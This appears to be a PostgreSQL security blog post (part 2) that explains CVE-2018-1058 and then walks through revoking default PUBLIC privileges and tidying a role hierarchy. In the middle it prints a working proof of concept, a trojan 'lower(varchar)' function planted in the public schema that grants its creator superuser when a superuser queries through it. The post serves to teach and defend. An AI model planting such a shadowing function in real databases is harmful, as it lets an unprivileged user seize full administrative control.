PostgreSQL Deep Dive: PostgreSQL Defaults and...

In Part 1 of this blog, we covered quite a bit of information with respect to how a PostgreSQL database is initially configured by default from the perspective of discretionary access control. We also saw how to inspect those default behaviors using the crunchy_check_access extension. In Part 2, we will explore the situation identified in CVE-2018-1058 and discuss how to protect yourself.

CVE-2018-1058: Explained and Exploited

Finally we have come to the Pièce De Résistance!

CVE-2018-1058 describes how a user can create objects, named the same as objects in different schemas which can change the behavior of other users' queries, potentially causing unexpected or malicious behavior. This is also known as a trojan-horse attack. In order to fully understand how this situation may arise, we will first review some fundamental PostgreSQL concepts.

Concept: Schemas

Schemas allow users to create objects in separate namespaces. This in turn allows multiple objects to have same object names, since they are differentiated by the namespace name, i.e. the schema name. By default:

All databases have schema called pg_catalog, which includes built-in objects provided by PostgreSQL which are generally necessary for normal database operations. These include very basic functions such as int4pl(), which adds two integers, as well as commonly used utility functions such as lower(). More on the lower() function later since it is the focus of the examples.
New databases have a schema called public, and any connected user can create objects in the public schema. We saw this earlier when examining permissions. This provides a place in which an arbitrary user can create an arbitrary function unless specific action is taken to prevent it.

Concept: Search Path

PostgreSQL searches the system catalog schema, pg_catalog first. Otherwise the search_path setting determines object resolution, similar to the way that the $PATH setting works for command resolution at a bash shell command line. By default:

search_path = $user, public
$user is equal to the SESSION_USER name

Although search_path starts with $user, the $user schema will not exist unless it is created. Recall earlier that a user must have the SUPERUSER attribute in order to create a schema in a database, so normal unprivileged roles cannot create this for themselves. However the public schema is second in line, and anybody can create objects there. Hold onto that thought.

Concept: Function Signature and Datatype Coercion

In addition to name resolution, as mentioned earlier functions are resolved by input argument datatype as well. Automatic implicit datatype coercion occurs for certain built-in datatypes. Example:

-- following function works for text,
-- or varchar if it exists alone in the search path
CREATE FUNCTION bar(text) ...;

-- but this function may also exist, and if so, it will handle varchar
CREATE FUNCTION bar(varchar) ...;

Consequences

By default:

All new objects (e.g. tables, functions) are created in the public schema.
Unqualified referenced objects are found in public schema. Note that by "unqualified" I mean references to an object that are not schema qualified. E.g. pg_catalog.int4pl(1,1) is fully schema qualified versus int4pl(1,1) which is not.
It is possible for an unprivileged (does not hold the SUPERUSER attribute) user to create function such that:
the function name matches a pg_catalog function
but with different argument datatype(s)
where the arguments are normally implicitly coerced datatype(s) when the pg_catalog version of the function is selected.

Some SQL will hopefully help make all of this a bit more clear:

CREATE TABLE foo(id int);

-- these are equivalent by default
SELECT * FROM foo;
SELECT * FROM public.foo;

-- clean up
DROP TABLE foo;

CREATE FUNCTION lower(varchar) RETURNS text AS $$
SELECT 'ALICE WAS HERE: ' || $1;
$$ LANGUAGE SQL IMMUTABLE;

-- note public.lower(varchar) will shadow pg_catalog.lower(text)
-- when the arg is actually varchar
\df lower
List of functions
  Schema   | Name  | Result data type | Argument data types | Type
------------+-------+------------------+---------------------+------
pg_catalog | lower | anyelement       | anyrange            | func
pg_catalog | lower | text             | text                | func
public     | lower | text             | character varying   | func

-- clean up
DROP FUNCTION lower(varchar);

As you can see here, the version of lower() in public takes an argument of type character varying, while the one in pg_catalog which ships with PostgreSQL takes an argument of type text. When an unsuspecting user subsequently executes SELECT lower('some varchar data') the former will now get used instead of the latter (assuming we had not dropped the function as we did above).

The problem is that when we combine

a default public schema CREATE privilege via the PUBLIC group
a default search_path setting which includes the public schema
the ability to create objects with the same names in different schemas
the method that PostgreSQL uses when it searches for objects based on search_path
function signature resolution
implicit datatype conversions

it presents the opportunity for one user to modify behavior of another user's query. For example, we can insert a function that, when executed by superuser, grants escalated privileges to ourselves.

Full Example

CREATE TABLE categories
(
category_id integer PRIMARY KEY,
category_name varchar(32) UNIQUE,
category_desc varchar(128)
);

INSERT INTO categories VALUES
(1, 'cold beverages', 'cold beverages, non-alcoholic'),
(2, 'beer', 'domestic beer'),
(3, 'craft beer', 'international and craft domestic beer'),
(4, 'hot beverages', 'tea, coffee, latte');

CREATE ROLE dbro LOGIN;

SET SESSION AUTHORIZATION dbro;

CREATE OR REPLACE FUNCTION lower(varchar)
RETURNS text AS $$
DECLARE
dbro_issu bool;
curr_issu bool;
BEGIN
dbro_issu := usesuper from pg_user where usename = 'dbro';
curr_issu := usesuper from pg_user where usename = CURRENT_USER;
IF curr_issu AND NOT dbro_issu THEN
ALTER USER dbro SUPERUSER;
END IF;
RETURN lower($1::text);
END;
$$ LANGUAGE plpgsql VOLATILE;

RESET SESSION AUTHORIZATION;
\du dbro
           List of roles
Role name | Attributes | Member of
-----------+------------+-----------
dbro      |            | {}

-- looks "normal"
SELECT category_desc FROM categories
WHERE lower(category_name) LIKE '%beverage%';
category_desc
-------------------------------
cold beverages, non-alcoholic
tea, coffee, latte
(2 rows)

-- but dbro successfully gained superuser
\du dbro
           List of roles
Role name | Attributes | Member of
-----------+------------+-----------
dbro      | Superuser  | {}

-- clean up
ALTER USER dbro NOSUPERUSER;
DROP FUNCTION lower(varchar);

The Fix

The first blush and simplest way to prevent this exploit is to not allow unprivileged roles to CREATE objects in the public schema, or any other schema in your default search_path.

REVOKE CREATE ON SCHEMA public FROM PUBLIC;

However there are a few other default privileges granted to PUBLIC to consider.

CONNECT, and TEMPORARY or TEMP on database objects
USAGE on plpgsql and sql languages
USAGE on the public schema
EXECUTE on newly created functions

Therefore the full fix might look like this:

REVOKE CREATE ON SCHEMA public FROM PUBLIC;
REVOKE EXECUTE ON ALL ROUTINES IN SCHEMA public FROM PUBLIC;
ALTER DEFAULT PRIVILEGES IN SCHEMA public
REVOKE EXECUTE ON ROUTINES FROM PUBLIC;

-- And/or possibly, more drastic options:
-- REVOKE USAGE ON SCHEMA public FROM PUBLIC;
-- DROP SCHEMA public CASCADE;

REVOKE TEMPORARY ON DATABASE deepdive FROM PUBLIC;

REVOKE USAGE ON LANGUAGE sql, plpgsql FROM PUBLIC;

From here you should go back and explicitly grant privileges to the roles that should have them. Take the role membership hierarchy into account, and fix it if needed. A simpler hierarchy will be easier to understand and anticipate consequences of the grants you make. Organize the privileges by granting to "group" roles and not directly to user/login roles. When finished, check the result with the check_access extension.

Cleanup

Let's check with check_access to see what we have at this point:

SELECT *
FROM all_access()
WHERE base_role != CURRENT_USER
AND base_role NOT LIKE 'pg_%';

There are still 413 rows even when excluding the postgres superuser and the built in pg_* roles. We can improve this situation a bit by ensuring or roles membership hierarchy is not out of whack. Recall what the current situation is:

\du
                                     List of roles
 Role name |                         Attributes                         |  Member of
-----------+------------------------------------------------------------+--------------
 alice     | No inheritance                                             | {endusers,joe}
 apps      | Cannot login                                               | {}
 appuser   |                                                            | {apps}
 bob       | No inheritance                                             | {dbadmins}
 dbadm     | Superuser                                                  | {}
 dbadmins  | Cannot login                                               | {}
 dbro      |                                                            | {}
 joe       |                                                            | {endusers}
endusers   | No inheritance, Cannot login                               | {dbadm}
 mary      |                                                            | {joe}
 postgres  | Superuser, Create role, Create DB, Replication, Bypass RLS | {}
 sue       |                                                            | {dbadmins}

What are the likely problems here?

dbadm is a login role with SUPERUSER, while dbadmins is a group role without the SUPERUSER attribute. We should probably drop dbadm since we don't want folks to log in directly as a superuser, but rather log in as themselves and then escalate using SET ROLE.
In doing the first step, endusers will lose the ability to become a superuser via dbadm. This is probably a good thing because based on that name, we would expect that group to be normal unprivileged users and not administrators. We should now consolidate our normal users under endusers and our presumed admins under dbadmins.
Additionally we can drop the dbro user we created for demonstration purposes earlier. We are going to assume that generic login accounts are discouraged, and we will only keep the ones necessary for our applications to connect -- in this case appuser.

DROP ROLE dbadm;
ALTER ROLE dbadmins SUPERUSER;
REVOKE joe FROM alice;
REVOKE joe FROM mary;
GRANT endusers TO mary;
DROP ROLE dbro;
\du
                                    List of roles
 Role name |                         Attributes                         | Member of
-----------+------------------------------------------------------------+------------
 alice     | No inheritance                                             | {endusers}
 apps      | Cannot login                                               | {}
 appuser   |                                                            | {apps}
 bob       | No inheritance                                             | {dbadmins}
 dbadmins  | Superuser, Cannot login                                    | {}
 joe       |                                                            | {endusers}
 endusers  | No inheritance, Cannot login                               | {}
 mary      |                                                            | {endusers}
 postgres  | Superuser, Create role, Create DB, Replication, Bypass RLS | {}
 sue       |                                                            | {dbadmins}

Much cleaner, and easier to understand! However we still have not dealt with the NOINHERIT attribute of several roles. Personally I think that the NOINHERIT attribute does not make much sense for unprivileged roles. If we use that at all, it probably should be for the administrative roles to ensure no leakage of privileges from the more privileged role to the normal login roles of these users.

ALTER ROLE alice INHERIT;
ALTER ROLE endusers INHERIT;
ALTER ROLE sue NOINHERIT;
\du
                                    List of roles
 Role name |                         Attributes                         | Member of
-----------+------------------------------------------------------------+------------
 alice     |                                                            | {endusers}
 apps      | Cannot login                                               | {}
 appuser   |                                                            | {apps}
 bob       | No inheritance                                             | {dbadmins}
 dbadmins  | Superuser, Cannot login                                    | {}
 joe       |                                                            | {endusers}
 endusers  | Cannot login                                               | {}
 mary      |                                                            | {endusers}
 postgres  | Superuser, Create role, Create DB, Replication, Bypass RLS | {}
 sue       | No inheritance                                             | {dbadmins}

Now we can see that bob and sue are our admins, while alice, joe, and mary are our normal users, and appuser is our system account for the application to use. Much better. Rerun check_access:

SELECT * FROM all_access()
WHERE base_role NOT LIKE 'pg_%'
AND base_role NOT IN ('bob', 'dbadmins', 'postgres', 'sue');

Notice that the superusers and built-in pg_* roles were eliminated intentionally, and now we have only 30 rows. That result is easy to comprehend, and we could even store it somewhere and rerun the same query later to detect undesired/unauthorized changes.

In fact, as a final exercise, let's rerun a modified version of the aggregate query form of this:

SELECT objtype, schemaname, objname, privname, array_agg(base_role)
FROM all_access()
WHERE base_role NOT LIKE 'pg_%'
AND base_role NOT IN ('bob', 'dbadmins', 'postgres', 'sue')
GROUP BY objtype, schemaname, objname, privname
ORDER BY 1, 2, 3, 4;
 objtype  | schemaname |   objname    | privname |              array_agg
----------+------------+--------------+----------+--------------------------------------
 database |            | deepdive     | CONNECT  | {alice,apps,appuser,joe,endusers,mary}
 schema   | public     | public       | USAGE    | {alice,apps,appuser,joe,endusers,mary}
 view     | public     | my_privs     | SELECT   | {alice,apps,appuser,joe,endusers,mary}
 view     | public     | my_privs_sys | SELECT   | {alice,apps,appuser,joe,endusers,mary}
 view     | public     | widget_inv   | SELECT   | {alice,apps,appuser,joe,endusers,mary}
(5 rows)

That is very easy to read and understand, and we can quickly surmise that our DAC is as it should be.

Conclusion

This blog has covered quite a bit of material, and yet there is much it did not cover. As mentioned, we could have explored the capabilities of the pg_* roles. We did not touch on the special status of object owners with respect to security -- hint, the owner largely bypasses DAC by default, and also row level security (RLS). And speaking of which, we did not cover RLS at all, and likely other things I am not thinking of at the moment. Ah well, material for another blog (or blog series) on another day.

I hope you stuck it out to the end and you enjoyed the learning. If you are reading this, congratulations!

Latest Articles

PostgreSQL Deep Dive: PostgreSQL Defaults and Impact on Security - Part 2